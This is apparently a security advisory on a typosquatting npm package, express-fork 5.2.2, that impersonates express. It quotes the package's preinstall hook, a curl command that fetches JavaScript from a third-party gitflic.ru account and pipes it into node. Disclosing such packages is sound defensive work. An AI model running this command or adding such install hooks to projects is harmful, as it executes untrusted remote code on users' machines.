npm · Malicious package advisory
Malwareexpress-fork
GHSA-5pr8-5p22-ffv8
Malicious code in express-fork (npm)
Details
**Severity:** Critical **Affected versions:** `= 5.2.2` ## Source: amazon-inspector (174daf2d7b9b396bb40a2ad347597eb7d1e829c46e4568e9700302e8aaceee3d) [email protected] is a typosquat of the express package. Its package.json metadata (description, author, repository, keywords) is copied verbatim from express, while package.json line 98 defines a preinstall lifecycle script that runs `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/...?file=node.js | node`. On every `npm install`, the hook fetches an unpinned JavaScript file from a third-party gitflic.ru account unrelated to the Express publisher (via a web.archive.org wrapper) and pipes it directly to the Node interpreter, with no integrity or signature check. The fetched content executes with the privileges of the installing user and can perform arbitrary actions on the installer's machine, including credential theft, persistence, or further payload delivery. The impersonation of express is the lure that causes typo-based installs to trigger the remote-exec hook. --- Credit: [OpenSSF](https://github.com/ossf/malicious-packages) ([source](https://github.com/ossf/malicious-packages/blob/7a1f1382a84618fabc1c45e8b61e9c9cea6ea33f/osv/malicious/npm/express-fork/MAL-2026-17490.json)) **References:** - https://github.com/ossf/malicious-packages/blob/7a1f1382a84618fabc1c45e8b61e9c9cea6ea33f/osv/malicious/npm/express-fork/MAL-2026-17490.json - https://www.npmjs.com/package/express-fork/v/5.2.2 - https://github.com/advisories/GHSA-5pr8-5p22-ffv8
Compromised versions (1)
- = 5.2.2
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.